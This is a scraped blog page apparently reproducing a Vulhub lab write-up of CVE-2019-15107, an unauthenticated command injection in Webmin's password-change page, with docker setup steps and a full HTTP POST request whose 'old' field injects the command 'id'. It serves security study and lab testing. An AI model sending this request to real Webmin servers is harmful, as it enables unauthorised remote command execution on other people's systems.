当前位置:网站首页>Vulhub vulnerability recurrence 73_ Webmin
Vulhub vulnerability recurrence 73_ Webmin
2022-07-06 05:19:00 【Revenge_ scan】
CVE-2019-15107_Webmin Remote command execution vulnerability
Vulnerability Details
Webmin Is a management class Unix System management configuration tool , have Web page . In its find password page , There is a command injection vulnerability that does not require permission , Through this vulnerability, attackers can execute arbitrary system commands .
Reference link :
-https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
- https://www.exploit-db.com/exploits/47230
- https://blog.firosolutions.com/exploits/webmin/
Environment building
shooting range :192.168.4.10_Ubuntu
Execute the following command , start-up webmin 1.910:
#docker-compose up -d
After execution , visit `https://your-ip:10000`, After ignoring the certificate, you can see webmin Login page for .
Loophole recurrence
The data package in the reference link is wrong , After reading the code , Only when sent user The value of the parameter is not known Linux In the case of users ( And the reference link is `user=root`), Will enter the modification `/etc/shadow` The place of , Trigger command injection vulnerability .
Send the following packets , You can execute the command `id`:
```
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
```
边栏推荐
- Pointer classic written test questions
- js Array 列表 实战使用总结
- Driver development - hellowdm driver
- RT thread analysis - object container implementation and function
- A little knowledge of CPU, disk and memory
- [effective Objective-C] - memory management
- MySQL advanced learning summary 9: create index, delete index, descending index, and hide index
- 01. 开发博客项目之项目介绍
- 關於Unity Inspector上的一些常用技巧,一般用於編輯器擴展或者其他
- Golang -- TCP implements concurrency (server and client)
猜你喜欢
Postman assertion
Rce code and Command Execution Vulnerability
指针经典笔试题
pix2pix:使用条件对抗网络的图像到图像转换
Compilation et connexion de shader dans games202 - webgl (comprendre la direction)
[leetcode16] the sum of the nearest three numbers (double pointer)
Cve-2019-11043 (PHP Remote Code Execution Vulnerability)
Vulhub vulnerability recurrence 71_ Unomi
图数据库ONgDB Release v-1.0.3
Ora-01779: the column corresponding to the non key value saving table cannot be modified
随机推荐
Yolov5 tensorrt acceleration
Sliding window problem review
Solution of QT TCP packet sticking
Upload nestjs configuration files, configure the use of middleware and pipelines
SQLite queries the maximum value and returns the whole row of data
2021 robocom world robot developer competition - undergraduate group (semi-finals)
RT thread analysis log system RT_ Kprintf analysis
Simple understanding of interpreters and compilers
Questions d'examen écrit classiques du pointeur
Codeforces Round #804 (Div. 2) Editorial(A-B)
The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
[noip2008 improvement group] stupid monkey
Yyds dry inventory SSH Remote Connection introduction
Select knowledge points of structure
Postman manage test cases
Mysql高级篇学习总结9:创建索引、删除索引、降序索引、隐藏索引
Postman test report
04. Project blog log
js Array 列表 实战使用总结
Ora-01779: the column corresponding to the non key value saving table cannot be modified